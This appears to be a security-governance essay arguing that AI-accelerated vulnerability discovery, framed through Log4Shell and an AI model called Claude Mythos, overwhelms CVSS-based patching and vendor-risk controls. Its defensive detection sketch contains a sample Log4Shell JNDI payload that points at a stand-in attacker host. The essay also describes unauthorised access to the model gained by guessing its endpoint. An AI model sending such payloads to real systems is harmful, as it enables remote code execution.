The Discovery Gap:
Why AI Just Broke Every Security Model We Have
Log4j taught us vulnerabilities existed long before anyone found them. Claude Mythos just showed us what happens when that discovery process is no longer limited by human speed — and this week, an unauthorised group proved the containment model is already failing.
The Lesson Log4j Actually Taught Us
In December 2021, a researcher at Alibaba Cloud disclosed a vulnerability to the Apache Software Foundation. The flaw — now known as Log4Shell — existed inside a Java logging library called Log4j, embedded so deeply into global infrastructure that patching it required an emergency mobilisation of security teams worldwide. Within days of disclosure, attackers were exploiting it approximately two million times per hour. The vulnerability earned a perfect CVSS score of 10.
But here is the detail most reporting missed: Log4Shell had existed since 2013. For eight years it sat silently inside millions of systems — banks, government networks, critical infrastructure, cloud platforms. Apple iCloud. Amazon. It was not created when Chen Zhaojun found it. It was simply discovered.
That distinction is the foundation of everything that follows. The threat was never the discovery. The threat was the gap between existence and awareness.
The question has never been whether vulnerabilities exist. It has always been when they are found.
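The mechanism behind Log4Shell is worth recalling: Log4j's message lookup feature meant that any logged string containing a `${jndi:...}` expression could cause the library to fetch and load remote code. A minimal detection sketch in Python, purely illustrative (real payloads used nesting and encoding tricks to evade exactly this kind of filter):

```python
import re

# Naive pattern for the classic Log4Shell trigger string.
# Real-world payloads used nested lookups and obfuscation to
# bypass filters like this one -- treat it as illustrative only.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def looks_like_log4shell(log_line: str) -> bool:
    """Flag log lines containing an obvious JNDI lookup attempt."""
    return bool(JNDI_PATTERN.search(log_line))

samples = [
    "GET / User-Agent: ${jndi:ldap://attacker.example/a}",
    "GET / User-Agent: Mozilla/5.0",
]
print([looks_like_log4shell(s) for s in samples])  # [True, False]
```

The point is not the regex. It is that the trigger was plain text in a log line, which is why the attack surface was every system that logged attacker-controlled input.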
The Shift: From Scarcity to Abundance
For decades, vulnerability management operated on a stable assumption: the number of discoverable vulnerabilities at any given time was constrained by human capacity. Researchers and threat actors moved at human speed. Organisations had an imperfect but functional window to assess, prioritise, and remediate. That window is now closing.
Then vs. Now
Pre-AI Era
- Discovery constrained by human bandwidth
- Patch cycles measured in days to weeks
- Manageable vulnerability backlogs
- CVSS scoring functional for prioritisation
- Reactive frameworks could absorb the pace
AI-Accelerated Era
- Discovery at machine speed — thousands per cycle
- Mean time to exploit now estimated at -7 days (exploitation precedes patch availability)
- Backlogs operationally unmanageable at volume
- CVSS alone meaningless at scale
- Reactive frameworks structurally inadequate
This month, Anthropic announced Claude Mythos Preview — a model it described as too dangerous to release publicly. In pre-release testing, Mythos autonomously identified thousands of zero-day vulnerabilities across every major operating system and browser, and could chain them into working exploits. A capability that previously required nation-state-level expertise now runs overnight on an API call.
AI doesn't create vulnerabilities. It removes the time barrier to finding them. And that changes everything about how risk must be governed.
The Containment Model Is Already Failing
Anthropic's response was considered: a controlled release to critical infrastructure partners under Project Glasswing — Amazon, Apple, Google, Microsoft, Nvidia — with the aim of giving defenders a head start. That strategy has already encountered its first failure.
This week, Bloomberg reported that an unauthorised group has been accessing Claude Mythos Preview through a third-party vendor environment since April 7 — the same day as the public announcement. Anthropic confirmed it is investigating. The group gained access by guessing the model's API endpoint from Anthropic's naming conventions — not sophisticated hacking, but pattern recognition through a contractor relationship. The access method is now publicly documented.
The group claims its intent is curiosity rather than harm. Security experts rightly point out that intent is irrelevant when the method is documented. This is not primarily a story about one group's access. It is a story about third-party vendor risk — the same vulnerability class that Log4j exposed in 2021, and one that remains structurally unresolved in most security programmes today.
The GRC Failure: Prioritisation at Impossible Scale
Vulnerability management exists to answer one question: which risks matter most, right now? That question only has a tractable answer when the number of inputs is manageable. When AI-driven discovery surfaces thousands of high-severity vulnerabilities in rapid succession, the prioritisation model doesn't strain — it breaks. When everything is critical, nothing is.
Current Control Failures
1. CVSS scoring was designed for bounded vulnerability counts — not machine-generated volume. It cannot handle the backlog.
2. Patch cycles assume time buffers that no longer exist. Mean time to exploit is now negative — exploitation before patching is the norm.
3. Alert fatigue in SIEM environments already degrades detection quality. At post-Mythos volumes, it collapses.
4. Third-party and dependency risk remains structurally unresolved. The Mythos breach came through a contractor, not Anthropic directly.
5. Most governance policies don't yet define AI-specific risk ownership, acceptable use, or vendor AI access controls.
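The arithmetic behind the first failure is simple. A toy model with invented, order-of-magnitude rates (the numbers are assumptions, not measurements) shows why the backlog never clears once discovery outpaces remediation:

```python
# Toy backlog model: hypothetical rates chosen only to illustrate
# the shape of the problem, not to match any real organisation.
DISCOVERED_PER_WEEK = 500   # AI-accelerated discovery rate (assumed)
REMEDIATED_PER_WEEK = 120   # human-paced patch capacity (assumed)

backlog = 0
for week in range(1, 13):
    backlog += DISCOVERED_PER_WEEK - REMEDIATED_PER_WEEK
    print(f"week {week:2d}: open criticals = {backlog}")

# With discovery outpacing remediation roughly 4:1, the backlog
# grows linearly and never clears. Prioritisation quality, not raw
# patch speed, becomes the binding constraint.
```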
Framework Mapping
These failures map directly onto control objectives organisations are already committed to under ISO 27001 and NIST CSF — which makes the gap between commitment and reality difficult to defend at board level.
ISO/IEC 27001:2022
- A.8.8 — Technical vulnerability management overwhelmed by AI discovery volume
- A.5.24–A.5.28 — Incident response capacity under acute pressure
- A.5.9 — Asset inventory incomplete; shadow dependencies untracked
- A.5.19–A.5.22 — Supplier security not continuously monitored
NIST CSF 2.0
- Identify — Attack surface inventory misses AI-discoverable vectors
- Protect — Traditional controls insufficient vs. automated exploitation
- Detect — SIEM signal-to-noise ratio collapsing
- Respond — Playbooks not calibrated for AI-speed incidents
- Recover — Recovery now frequent, not exceptional
Risk Assessment
| Risk Factor | Inherent Risk | Residual Risk |
|---|---|---|
| AI-accelerated exploitation at scale | Almost Certain | Likely |
| Unauthorised access to Mythos-class models | Confirmed | Under Investigation |
| Prioritisation model collapse under volume | Extreme | High |
| Third-party vendor risk propagation | Extreme | Partially Addressed |
| Adequacy of governance frameworks for the AI era | Inadequate | Inadequate |
How Will Organisations Cope?
The short answer: most won't — at least not initially. The industry is already behind before Mythos-level capabilities reach broad availability.
Automated, machine-speed defence
Organisations that survive will have built tightly integrated detection and response pipelines combining AI analytics, security orchestration, and pre-approved automated remediation. Early data shows these platforms achieving 90% automation of Tier-1 analyst tasks and 10× faster response times. They treat AI as an operational necessity on the defensive side, not an experiment.
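In practice, "pre-approved automated remediation" reduces to a policy gate: playbook actions on an approved list, targeting non-critical assets, execute without a human in the loop; everything else is escalated. A minimal sketch, with hypothetical action names and asset tiers:

```python
from dataclasses import dataclass

# Hypothetical pre-approved action list. A real SOAR platform would
# load this from change-management policy, not hard-code it.
PRE_APPROVED = {"isolate_host", "block_ip", "rollback_patch"}

@dataclass
class Alert:
    action: str       # remediation the playbook wants to take
    asset_tier: int   # 1 = business-critical ... 3 = low-impact

def route(alert: Alert) -> str:
    """Auto-execute only pre-approved actions on non-critical assets."""
    if alert.action in PRE_APPROVED and alert.asset_tier >= 2:
        return "auto_execute"
    return "human_review"

print(route(Alert("block_ip", asset_tier=3)))   # auto_execute
print(route(Alert("block_ip", asset_tier=1)))   # human_review
```

The design choice that matters is the default: anything not explicitly pre-approved falls through to a human, so automation failures degrade to the old workflow rather than to silence.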
Reactive restructuring
SANS Institute, the Cloud Security Alliance, and OWASP released an emergency strategy briefing this month — produced over a single weekend by 60+ contributors. The fact it was an emergency briefing, not a planned publication, tells you the current state of readiness. These organisations are restructuring around contextual risk scoring and continuous exposure monitoring — reactively.
Counting CVEs, missing the threat
Most organisations are still running CVSS-based prioritisation and human-paced patch cycles. Critical Microsoft vulnerabilities doubled year-over-year — 78 to 157 in 12 months — driven by AI-accelerated discovery. Many security dashboards are reporting this as good news because total CVE counts dipped. They are measuring the wrong thing entirely.
What Actually Needs to Change
- Establish an AI Risk Governance Policy — define acceptable use, monitoring, and explicit ownership of AI-driven vectors at board level
- Integrate AI threat modelling into annual risk assessments as a primary item, not an addendum
- Mandate vendor AI access controls — the Mythos breach came through a contractor; third-party agreements must include AI model governance
- Transition from CVSS-only to contextual risk scoring — asset criticality, real-time exposure, and business impact
- Shift from vulnerability management to exposure management — continuous, not point-in-time
- Mandate SBOM for all critical systems and extend to full supply chain dependencies
- Deploy SOAR — automated response pipelines are no longer optional at machine-speed attack rates
- Integrate threat intelligence feeds contextualising AI-discovered vulnerabilities against active exploitation data
- Automate patching for lower-criticality systems to preserve analyst capacity for high-impact decisions
- Enforce continuous vendor monitoring, not annual assessments
- Require contractors to disclose AI model access in standard security questionnaires
- Conduct dependency audits with explicit Log4j-class and Mythos-class breach scenarios in scope
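The shift from CVSS-only to contextual scoring, recommended above, can be made concrete. One common shape is a weighted blend of base severity, asset criticality, and exposure, with an override for active exploitation. The weights and factor names below are assumptions for illustration, not a standard:

```python
def contextual_risk(cvss: float, asset_criticality: float,
                    exposure: float, exploited_in_wild: bool) -> float:
    """Blend CVSS with business context.

    cvss: 0-10 base score; asset_criticality and exposure: 0-1.
    Weights are illustrative assumptions, not an industry standard.
    """
    score = 0.4 * cvss + 0.3 * (asset_criticality * 10) + 0.3 * (exposure * 10)
    if exploited_in_wild:  # active exploitation trumps everything else
        score = min(10.0, score + 2.0)
    return round(score, 1)

# Two identical CVSS 9.8 criticals diverge sharply once context applies:
internet_facing = contextual_risk(9.8, 0.9, 0.95, True)
isolated_lab = contextual_risk(9.8, 0.2, 0.05, False)
print(internet_facing, isolated_lab)  # 10.0 4.7
```

This is the mechanism that makes triage tractable again: instead of thousands of indistinguishable "criticals", the queue sorts by what is actually reachable and actually being exploited.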
The Strategic Shift Required
Log4j was a warning about dependency risk hiding in plain sight. The Mythos moment is a warning about something structural: our entire security architecture was designed for a world where vulnerabilities were scarce, human-discovered, and exploited at human speed.
That world ended this month.
The organisations that navigate this well won't be the fastest patchers. They'll be the ones that recognised earliest that the problem had fundamentally changed — and redesigned their measurement systems, governance frameworks, and operational models accordingly. Most will cope the way they always have: reactively, after something breaks.
The question is no longer: can we find vulnerabilities?
It is: can we make decisions fast enough in a world where discovery and exploitation are both automated?